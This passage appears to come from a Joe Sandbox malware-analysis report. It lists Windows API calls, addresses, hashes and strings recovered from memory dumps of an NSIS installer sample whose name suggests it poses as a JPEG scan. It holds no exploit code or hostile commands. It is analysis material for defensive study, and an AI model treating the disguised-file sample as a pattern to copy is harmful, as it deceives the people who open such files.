                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 48b772c591d60bd120ceb21c558333e6da892a782e2c7f4c33aa573d96a0a8bb
                                  • Instruction ID: 5cdea38fe39661480990cc8a004f6d9d9bf1a0cca829e9caf547f016d39c1b54
                                  • Opcode Fuzzy Hash: 48b772c591d60bd120ceb21c558333e6da892a782e2c7f4c33aa573d96a0a8bb
                                  • Instruction Fuzzy Hash: 7BF17475D00229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF44
                                  APIs
                                  • GetDlgItem.USER32(?,00000403), ref: 0040522E
                                  • GetDlgItem.USER32(?,000003EE), ref: 0040523D
                                  • GetClientRect.USER32(?,?), ref: 0040527A
                                  • GetSystemMetrics.USER32(00000002), ref: 00405281
                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052A2
                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052B3
                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C6
                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052D4
                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E7
                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405309
                                  • ShowWindow.USER32(?,00000008), ref: 0040531D
                                  • GetDlgItem.USER32(?,000003EC), ref: 0040533E
                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040534E
                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405367
                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405373
                                  • GetDlgItem.USER32(?,000003F8), ref: 0040524C
                                    • Part of subcall function 0040403E: SendMessageA.USER32(00000028,?,00000001,00403E6E), ref: 0040404C
                                  • GetDlgItem.USER32(?,000003EC), ref: 0040538F
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005163,00000000), ref: 0040539D
                                  • CloseHandle.KERNEL32(00000000), ref: 004053A4
                                  • ShowWindow.USER32(00000000), ref: 004053C7
                                  • ShowWindow.USER32(?,00000008), ref: 004053CE
                                  • ShowWindow.USER32(00000008), ref: 00405414
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405448
                                  • CreatePopupMenu.USER32 ref: 00405459
                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040546E
                                  • GetWindowRect.USER32(?,000000FF), ref: 0040548E
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A7
                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054E3
                                  • OpenClipboard.USER32(00000000), ref: 004054F3
                                  • EmptyClipboard.USER32 ref: 004054F9
                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405502
                                  • GlobalLock.KERNEL32(00000000), ref: 0040550C
                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405520
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405539
                                  • SetClipboardData.USER32(00000001,00000000), ref: 00405544
                                  • CloseClipboard.USER32 ref: 0040554A
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                  • String ID:
                                  • API String ID: 590372296-0
                                  • Opcode ID: 5bdd9b46476261559d6694a4cd74e20f816b77f87763010c5b76ad9fb73ac299
                                  • Instruction ID: 0e806a1c10c1a3103ec1b6ff030541c572903ae85d70ab094f2e75f2d1af7317
                                  • Opcode Fuzzy Hash: 5bdd9b46476261559d6694a4cd74e20f816b77f87763010c5b76ad9fb73ac299
                                  • Instruction Fuzzy Hash: ABA15AB1900209BFDB219FA4DD89AAE7F79FB04355F10403AFA04B62A0C7B55E41DF69
                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B71
                                  • ShowWindow.USER32(?), ref: 00403B8E
                                  • DestroyWindow.USER32 ref: 00403BA2
                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BBE
                                  • GetDlgItem.USER32(?,?), ref: 00403BDF
                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BF3
                                  • IsWindowEnabled.USER32(00000000), ref: 00403BFA
                                  • GetDlgItem.USER32(?,00000001), ref: 00403CA8
                                  • GetDlgItem.USER32(?,00000002), ref: 00403CB2
                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403CCC
                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D1D
                                  • GetDlgItem.USER32(?,00000003), ref: 00403DC3
                                  • ShowWindow.USER32(00000000,?), ref: 00403DE4
                                  • EnableWindow.USER32(?,?), ref: 00403DF6
                                  • EnableWindow.USER32(?,?), ref: 00403E11
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E27
                                  • EnableMenuItem.USER32(00000000), ref: 00403E2E
                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E46
                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E59
                                  • lstrlenA.KERNEL32(0041FD08,?,0041FD08,00000000), ref: 00403E83
                                  • SetWindowTextA.USER32(?,0041FD08), ref: 00403E92
                                  • ShowWindow.USER32(?,0000000A), ref: 00403FC6
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                  • String ID:
                                  • API String ID: 184305955-0
                                  • Opcode ID: 81c88675faf25888c04451cc2ffaec258773ee0ceb852ea8c66f1226f3afe971
                                  • Instruction ID: ece9219a4d70184b68c45d6c06b8272552e5c94251c83fd0e936414de4f8c744
                                  • Opcode Fuzzy Hash: 81c88675faf25888c04451cc2ffaec258773ee0ceb852ea8c66f1226f3afe971
                                  • Instruction Fuzzy Hash: 7AC1C0B1A04205BBDB206F61EE48E2B3E7DFB45706F40453EF601B11E1C779A9429B6E
                                  APIs
                                    • Part of subcall function 00406302: GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
                                    • Part of subcall function 00406302: GetProcAddress.KERNEL32(00000000,?), ref: 0040632F
                                  • lstrcatA.KERNEL32(0042A000,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,75953410,0042A400,00429000,00000000), ref: 00403813
                                  • lstrlenA.KERNEL32(004226A0,?,?,?,004226A0,00000000,00429400,0042A000,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,75953410), ref: 00403888
                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 0040389B
                                  • GetFileAttributesA.KERNEL32(004226A0), ref: 004038A6
                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00429400), ref: 004038EF
                                    • Part of subcall function 00405EC8: wsprintfA.USER32 ref: 00405ED5
                                  • RegisterClassA.USER32(00422EA0), ref: 0040392C
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403944
                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403979
                                  • ShowWindow.USER32(00000005,00000000), ref: 004039AF
                                  • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039DB
                                  • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039E8
                                  • RegisterClassA.USER32(00422EA0), ref: 004039F1
                                  • DialogBoxParamA.USER32(?,00000000,00403B35,00000000), ref: 00403A10
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                  • API String ID: 1975747703-2904746566
                                  • Opcode ID: 6992a9b3df8017145895e51aef8ae2a8cf28360cdeb3b2749b9af584065ecc2b
                                  • Instruction ID: 22145a8d87807f1e884b2dd2f98424a05527e1b570cf61420d2a276d1199ab18
                                  • Opcode Fuzzy Hash: 6992a9b3df8017145895e51aef8ae2a8cf28360cdeb3b2749b9af584065ecc2b
                                  • Instruction Fuzzy Hash: 3B61D5B1744200BED720BF659D45F2B3AACEB4475AB40447EF941B22E2C67C9D069A2E
                                  APIs
                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041FF
                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404213
                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404231
                                  • GetSysColor.USER32(?), ref: 00404242
                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404251
                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404260
                                  • lstrlenA.KERNEL32(?), ref: 00404263
                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404272
                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404287
                                  • GetDlgItem.USER32(?,0000040A), ref: 004042E9
                                  • SendMessageA.USER32(00000000), ref: 004042EC
                                  • GetDlgItem.USER32(?,000003E8), ref: 00404317
                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404357
                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00404366
                                  • SetCursor.USER32(00000000), ref: 0040436F
                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404385
                                  • SetCursor.USER32(00000000), ref: 00404388
                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043B4
                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                  • String ID: ?A@$N
                                  • API String ID: 3103080414-3605915619
                                  • Opcode ID: 073baeb7e2e56e8e61070ac22e94b8c547292f2e7e559fc5b4704c6dbdd391f8
                                  • Instruction ID: 58642e7cad261c001b024910741a92c2a1970d4d91afa6865c69404cbc82dd24
                                  • Opcode Fuzzy Hash: 073baeb7e2e56e8e61070ac22e94b8c547292f2e7e559fc5b4704c6dbdd391f8
                                  • Instruction Fuzzy Hash: F061B2B1A40209BFEB109F61DD45B6A7B69FB84715F008036FB04BA2D1C7B8A951CB99
                                  APIs
                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                  • DeleteObject.GDI32(?), ref: 004010ED
                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                  • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                  • DeleteObject.GDI32(?), ref: 00401165
                                  • EndPaint.USER32(?,?), ref: 0040116E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: F
                                  • API String ID: 941294808-1304234792
                                  • Opcode ID: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
                                  • Instruction ID: d756f8073455ec7f94eaaa006bac723f94b68f9cc4de0a6a70f3062e944f429a
                                  • Opcode Fuzzy Hash: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
                                  • Instruction Fuzzy Hash: 6E419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                  APIs
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D6A,?,?), ref: 00405C0A
                                  • GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405C13
                                    • Part of subcall function 00405A68: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A78
                                    • Part of subcall function 00405A68: lstrlenA.KERNEL32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAA
                                  • GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405C30
                                  • wsprintfA.USER32 ref: 00405C4E
                                  • GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405C89
                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C98
                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CD0
                                  • SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D26
                                  • GlobalFree.KERNEL32(00000000), ref: 00405D37
                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D3E
                                    • Part of subcall function 00405B03: GetFileAttributesA.KERNEL32(00000003,00402DA3,0042AC00,80000000,00000003), ref: 00405B07
                                    • Part of subcall function 00405B03: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                  • String ID: %s=%s$[Rename]
                                  • API String ID: 2171350718-1727408572
                                  • Opcode ID: cd0aa59a73482e16cbacdae304ee390d59bfd628383bb3a13ec19384333e6ea7
                                  • Instruction ID: 5deb0727307c374d823852481fd1d72290d2d80dc16b0ec149a77f792b4fa3ea
                                  • Opcode Fuzzy Hash: cd0aa59a73482e16cbacdae304ee390d59bfd628383bb3a13ec19384333e6ea7
                                  • Instruction Fuzzy Hash: 0F31F231605B156BD6206B659C49F6B3AACDF45754F14043BBE01FA2D2E67CAC008EBD
                                  APIs
                                  • GetDlgItem.USER32(?,000003FB), ref: 004044EA
                                  • SetWindowTextA.USER32(00000000,?), ref: 00404514
                                  • SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 004045C5
                                  • CoTaskMemFree.OLE32(00000000), ref: 004045D0
                                  • lstrcmpiA.KERNEL32(004226A0,0041FD08), ref: 00404602
                                  • lstrcatA.KERNEL32(?,004226A0), ref: 0040460E
                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404620
                                    • Part of subcall function 0040566A: GetDlgItemTextA.USER32(?,?,00000400,00404657), ref: 0040567D
                                    • Part of subcall function 004061D4: CharNextA.USER32(?,*?|<>/":,00000000,00429000,75953410,0042A400,00000000,004031B1,0042A400,0042A400,004033E8,?,00000006,00000008,0000000A), ref: 0040622C
                                    • Part of subcall function 004061D4: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406239
                                    • Part of subcall function 004061D4: CharNextA.USER32(?,00429000,75953410,0042A400,00000000,004031B1,0042A400,0042A400,004033E8,?,00000006,00000008,0000000A), ref: 0040623E
                                    • Part of subcall function 004061D4: CharPrevA.USER32(?,?,75953410,0042A400,00000000,004031B1,0042A400,0042A400,004033E8,?,00000006,00000008,0000000A), ref: 0040624E
                                  • GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 004046DE
                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F9
                                    • Part of subcall function 00404852: lstrlenA.KERNEL32(0041FD08,0041FD08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040476D,000000DF,00000000,00000400,?), ref: 004048F0
                                    • Part of subcall function 00404852: wsprintfA.USER32 ref: 004048F8
                                    • Part of subcall function 00404852: SetDlgItemTextA.USER32(?,0041FD08), ref: 0040490B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: A
                                  • API String ID: 2624150263-3554254475
                                  • Opcode ID: 98fa1f5753ac6d52d71c554bedecad8f06ba05873235280509391dd3d3ccc75b
                                  • Instruction ID: 64b5da15ede57aab044e7fe1d22d086372aa44ea1ea65b7a694081baf4ac5fa5
                                  • Opcode Fuzzy Hash: 98fa1f5753ac6d52d71c554bedecad8f06ba05873235280509391dd3d3ccc75b
                                  • Instruction Fuzzy Hash: 09A1A0B1900209ABDB11AFA5CC41AEFB7B8EF85314F14843BF611B72D1D77C8A418B69
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402D74
                                  • GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402D90
                                    • Part of subcall function 00405B03: GetFileAttributesA.KERNEL32(00000003,00402DA3,0042AC00,80000000,00000003), ref: 00405B07
                                    • Part of subcall function 00405B03: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29
                                  • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402DDC
                                  Strings
                                  • Error launching installer, xrefs: 00402DB3
                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
                                  • Null, xrefs: 00402E5A
                                  • soft, xrefs: 00402E51
                                  • Inst, xrefs: 00402E48
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                  • API String ID: 4283519449-1074636621
                                  • Opcode ID: 1397dd72d6c115af7393f493c685ca3f8ebbcff4dac0a2af7d9ad0e79a19b9bb
                                  • Instruction ID: 2e32d7aad0b4ca297083aa7498b96cb894cc3d31802a5233eda7db803f364c93
                                  • Opcode Fuzzy Hash: 1397dd72d6c115af7393f493c685ca3f8ebbcff4dac0a2af7d9ad0e79a19b9bb
                                  • Instruction Fuzzy Hash: CB51D6B1900215ABDB219F65DE89B9F7AB8EB04365F10403BF904B62D1C7BC9E418B9D
                                  APIs
                                  • GetSystemDirectoryA.KERNEL32(004226A0,00000400), ref: 004060B7
                                  • GetWindowsDirectoryA.KERNEL32(004226A0,00000400,?,0041F4E8,00000000,004050C9,0041F4E8,00000000), ref: 004060CA
                                  • SHGetSpecialFolderLocation.SHELL32(004050C9,00000000,?,0041F4E8,00000000,004050C9,0041F4E8,00000000), ref: 00406106
                                  • SHGetPathFromIDListA.SHELL32(00000000,004226A0), ref: 00406114
                                  • CoTaskMemFree.OLE32(00000000), ref: 00406120
                                  • lstrcatA.KERNEL32(004226A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406144
                                  • lstrlenA.KERNEL32(004226A0,?,0041F4E8,00000000,004050C9,0041F4E8,00000000,00000000,?,00000000), ref: 00406196
                                  Strings
                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406086
